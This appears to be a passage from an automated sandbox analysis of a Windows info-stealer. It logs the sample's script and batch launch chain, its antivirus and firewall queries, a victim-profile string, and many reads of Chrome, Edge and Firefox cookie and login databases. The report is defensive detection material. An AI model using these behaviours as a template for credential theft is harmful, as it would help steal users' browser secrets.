                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\providerBrowserruntimeCrt\Providerbroker.exe "C:\providerBrowserruntimeCrt/Providerbroker.exe"Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe "C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe" Jump to behavior
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003665000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Files Count (8c96)":"?","Files Groups (8c96)":"?","Has Crypto Wallets (fff5)":"?","Crypto Extensions (fff5)":"?","Crypto Clients (fff5)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.4",5,1,"","user","134349","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\providerBrowserruntimeCrt","SASSUT (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7503 / -74.0014"]
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003665000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7503 / -74.0014"]
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Files Count (8c96)":"?","Files Groups (8c96)":"?","Has Crypto Wallets (fff5)":"?","Crypto Extensions (fff5)":"?","Crypto Clients (fff5)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.4",5,1,"","user","134349","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\providerBrowserruntimeCrt","SASSUT (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New Yor
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_01010723 cpuid 0_2_01010723
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0101AF0F
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeQueries volume information: C:\providerBrowserruntimeCrt\Providerbroker.exe VolumeInformationJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeQueries volume information: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe VolumeInformationJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0101DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0101DF1E
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0100B146 GetVersionExW,0_2_0100B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Source: Yara matchFile source: 0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000C.00000002.3319845623.0000000003810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000C.00000002.3319845623.00000000039E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: Providerbroker.exe PID: 6204, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: BSlvAOjamepaXWJMhY.exe PID: 5148, type: MEMORYSTR
                                    Source: Yara matchFile source: 9FwQYJSj4N.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49354fb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49364fb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49354fb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49364fb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Providerbroker.exe.450000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.2080050228.00000000048E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2080638886.00000000048E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.2131916065.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Windows\PrintDialog\pris\spoolsv.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\providerBrowserruntimeCrt\Providerbroker.exe, type: DROPPED
                                    Source: Yara matchFile source: 9FwQYJSj4N.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49354fb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49364fb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49354fb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49364fb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Providerbroker.exe.450000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Windows\PrintDialog\pris\spoolsv.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\providerBrowserruntimeCrt\Providerbroker.exe, type: DROPPED
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
